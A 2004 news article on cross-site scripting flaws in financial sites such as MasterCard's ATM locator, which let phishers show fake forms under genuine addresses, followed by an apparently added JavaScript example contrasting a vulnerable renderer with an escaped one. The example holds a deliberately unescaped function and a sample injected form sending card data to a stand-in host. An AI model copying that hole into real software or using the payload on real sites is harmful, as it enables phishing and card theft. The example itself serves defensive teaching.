Phishers finding easy prey

By Paul Roberts, Network World, 07/26/2004

Leading financial institutions have adopted a more-aggressive attitude toward online identity-theft cons known as "phishing scams" in recent months. But companies could be unwittingly helping phishers trick online shoppers, says a new report from a U.K. Web developer.

A test of leading financial services Web sites, including those run by MasterCard, NatWest and Reuters Group, revealed that many sites have loosely protected features that scam artists can use to mask their own malicious Web sites, hijacking the names and Web addresses of established institutions, says Sam Greenhalgh, the 19-year-old who operates the Web site Zapthedingbat.com.

Greenhalgh is responsible for discovering a vulnerability in Microsoft's Internet Explorer Web browser known as the "%01" vulnerability. That security hole, since closed by Microsoft, has been widely used in scams to disguise the location of phishing Web sites, which online scam artists use to harvest sensitive personal and financial information from their victims. He published a report at zapthedingbat.com on his latest findings. The security lapses at major financial sites are not caused by flawed Microsoft products, Greenhalgh says. Indeed, the trick works with most popular Web browsers. Instead, poorly designed and insecure features on leading Web sites that contain cross-site scripting vulnerabilities are to blame.

Greenhalgh uses the example of the ATM locator feature on MasterCard's Web site. The feature was designed to help people find cash machines that accept MasterCard. Users input a location, including a country and street address, and the Web site provides the location of cash machines in the area. However, because of a cross-site scripting vulnerability in the feature, Greenhalgh injected his own HTML into the fields used by the ATM locator, causing the mastercard.com site to display his content, including a mock form that could be used to harvest information. With the Web browser address bar reading "http://www.mastercard.com" and the MasterCard logo adorning the page, even sophisticated Web surfers would be hard-pressed to prove that they were not interacting with the credit card company instead of scam artists, Greenhalgh says. MasterCard declined to comment for this story.
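The locator flaw described above is a reflected cross-site scripting bug: the site echoes the user's location query into its own page without encoding it. The following is an added example, not code from the article or from MasterCard's site; the page layout, function names and the `example.invalid` URL are constructed, and it shows the echoing render function beside a hardened version plus a simple check a reviewer can run against either.

```javascript
// Added example (hypothetical ATM-locator page, not MasterCard's code).

// Vulnerable version: the query is concatenated straight into the HTML,
// so any markup in the "location" parameter is rendered as real markup
// on the institution's own origin, logo and address bar included.
function renderLocatorResultVulnerable(location) {
  return '<h1>ATM locator</h1>' +
         '<p>Results near: ' + location + '</p>' +
         '<ul><li>No cash machines found.</li></ul>';
}

// Hardened version: every character that can open or close HTML syntax
// is replaced by its entity before the query is placed in the page.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderLocatorResultSafe(location) {
  return '<h1>ATM locator</h1>' +
         '<p>Results near: ' + escapeHtml(location) + '</p>' +
         '<ul><li>No cash machines found.</li></ul>';
}

// Crude regression check for a code review or a test suite: does any tag
// the user typed survive as a real tag in the rendered output? It only
// looks at tag names, so it is a smoke test, not a full HTML parser.
function reflectsUserMarkup(render, input) {
  const typedTags = input.match(/<\s*[a-zA-Z][\w-]*/g) || [];
  const html = render(input);
  return typedTags.some((tag) => html.includes(tag));
}

// Constructed sample input standing in for the mock form the article
// describes: a street name followed by an attacker-supplied form.
const CONSTRUCTED_INPUT =
  'London<form action="https://example.invalid/collect">' +
  '<input name="card"></form>';

// Stand-alone run: the vulnerable renderer reflects the form, the safe one does not.
console.log('vulnerable reflects markup:',
  reflectsUserMarkup(renderLocatorResultVulnerable, CONSTRUCTED_INPUT));
console.log('hardened reflects markup:',
  reflectsUserMarkup(renderLocatorResultSafe, CONSTRUCTED_INPUT));
```

Output encoding at the point where untrusted input meets the page is the fix; the check above is the kind of assertion that would have caught the locator echoing a form before it shipped.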
